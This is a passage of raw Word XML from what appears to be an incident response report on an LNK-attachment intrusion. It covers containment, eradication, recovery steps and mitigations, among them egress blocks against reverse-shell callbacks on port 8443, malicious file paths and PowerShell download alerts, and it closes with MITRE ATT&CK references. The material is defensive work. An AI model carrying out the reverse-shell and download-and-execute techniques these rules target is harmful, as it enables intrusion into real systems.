        <w:t>Block current attacker connectivity:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="56E3117B" w14:textId="585D2C39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Temporarily block outbound to attacker IP &lt;ATTACKER_IP&gt; and port 8443.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="1F3B42F4" w14:textId="4C42489D">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="139A40EA" w14:textId="5D3F37DE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Eradication (remove sources of compromise)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="6F6CBDBE" w14:textId="588C5237">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="69CAFC1C" w14:textId="2C190BE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Preserve evidence (screenshots/log exports) before removal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="3F82C03E" w14:textId="3B9066B7">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="317D0506" w14:textId="6358421E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Remove malicious artefacts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="67B528F2" w14:textId="725B34C9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="71A94E5F" w14:textId="36DE548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Delete C:\icrm\notepad.exe (malicious LNK shortcut)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="3D7D9ABB" w14:textId="06532FFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Delete C:\icrm\8443.exe if present</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="5E38A314" w14:textId="09298044">
      <w:pPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="2E896EB5" w14:textId="4B555581">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Conduct a scan and confirm no persistence (startup entries, scheduled tasks, registry Run keys).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="35CB872E" w14:textId="0860D707">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="73B5969F" w14:textId="711F201F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Recovery (prevent further compromise)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="1DA4C67A" w14:textId="307530B4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="0D7BD869" w14:textId="6367057F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Reset credentials for the affected user account if interactive access was confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="50138F01" w14:textId="4417CE98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Validate system integrity and restore normal operations only after verification.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="00D01BC9" w14:paraId="5B5FCDDA" w14:textId="7EFA430C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00C3354B" w:rsidP="00C3354B" w:rsidRDefault="6845FCFF" w14:paraId="05690E39" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896684" w:id="21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Control/Mitigation </w:t>
      </w:r>
      <w:commentRangeStart w:id="22"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:commentRangeEnd w:id="22"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="22"/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="00D01BC9" w14:paraId="25B5843A" w14:textId="73FBB1B4"/>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="6ED78412" w14:textId="36C134FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Email attachment filtering</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="1D230DB8" w14:textId="154A42E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Block inbound </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.LNK attachments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from external senders.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="76EE0F88" w14:textId="59ED9A5F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Use sandbox detonation for suspicious attachments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="1027D2AC" w14:textId="07F5E254">
      <w:pPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="56FC22AA" w14:textId="0C5A38D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Egress filtering / outbound firewall control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="683889A5" w14:textId="4F2B0CA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Restrict outbound traffic to untrusted destinations and uncommon ports (e.g., TCP/8443).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="33DA1CFD" w14:textId="75627D2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This directly disrupts reverse shell callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="6DEEE8A0" w14:textId="7B180B99">
      <w:pPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="21598BCC" w14:textId="2F6D09A6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell hardening and logging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="37F087C3" w14:textId="488BDEDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Enable PowerShell logging (Script Block logging and Module logging).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="17ABA5B9" w14:textId="10859C1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Alert on PowerShell downloading executables to user-accessible directories.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="65F5F369" w14:textId="2AD9BC5F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="7ED300D4" w14:textId="6D28E133">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="545F07EE" w14:textId="4C90A768">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Use AppLocker/WDAC to restrict execution from non-standard directories such as C:\icrm\.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="107BBBC0" w14:textId="0CBAD6D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Prevents “download-to-folder and execute” payload behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00D01BC9" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="6F7AAD05" w14:textId="61E36A1D">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="00C3354B" w:rsidP="00C3354B" w:rsidRDefault="00C3354B" w14:paraId="0D7FE594" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896685" w:id="23"/>
      <w:commentRangeStart w:id="24"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:commentRangeEnd w:id="24"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="24"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9182" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4395"/>
        <w:gridCol w:w="4787"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00C3354B" w:rsidTr="6845FCFF" w14:paraId="01AA48A4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="6845FCFF" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="155B2BAE" w14:textId="2E126CF2">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Spearphishing Attachment (T1566.001) – MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4787" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="6845FCFF" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="4847D5B0" w14:textId="6C3EF860">
            <w:hyperlink r:id="rId36">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1566/001/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00C3354B" w:rsidTr="6845FCFF" w14:paraId="6367E9C7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="6845FCFF" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="2610725F" w14:textId="7ADD0BE6">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>User Execution: Malicious File (T1204.002) – MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4787" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="6845FCFF" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="38113212" w14:textId="2BBF66A0">
            <w:hyperlink r:id="rId37">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1204/002/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00C3354B" w:rsidTr="6845FCFF" w14:paraId="4D13D95F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="6845FCFF" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="3C051227" w14:textId="3CAB920E">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ingress Tool Transfer (T1105) – MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4787" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="6845FCFF" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="658C1550" w14:textId="43BAC68C">
            <w:hyperlink r:id="rId38">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1105/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="6845FCFF" w:rsidTr="6845FCFF" w14:paraId="5BE10695" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="6845FCFF" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="4FBAFFE0" w14:textId="51EEBB75">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows Command Shell (T1059.003) – MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4787" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="6845FCFF" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="4B6AEAB2" w14:textId="31AA54C3">
            <w:hyperlink r:id="rId39">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1059/003/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="6845FCFF" w:rsidTr="6845FCFF" w14:paraId="20FBBF00" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="6845FCFF" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="552CC009" w14:textId="6E604CD5">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PowerShell (T1059.001) – MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4787" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="6845FCFF" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="66829552" w14:textId="67FA299F">
            <w:hyperlink r:id="rId40">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1059/001/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="6845FCFF" w:rsidTr="6845FCFF" w14:paraId="037881DC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="6845FCFF" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="56EA1BDD" w14:textId="3CE358C8">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>File Deletion (T1070.004) – MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4787" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="6845FCFF" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="08619863" w14:textId="483E9E30">
            <w:hyperlink r:id="rId41">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1070/004/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="791B8C86" w14:textId="3F6DADE4"/>
    <w:p w:rsidR="00C3354B" w:rsidP="00C3354B" w:rsidRDefault="00C3354B" w14:paraId="0D86ED74" w14:textId="77777777">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00500AD9" w:rsidP="0050779F" w:rsidRDefault="00326ED4" w14:paraId="32B01497" w14:textId="4E78E0F4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
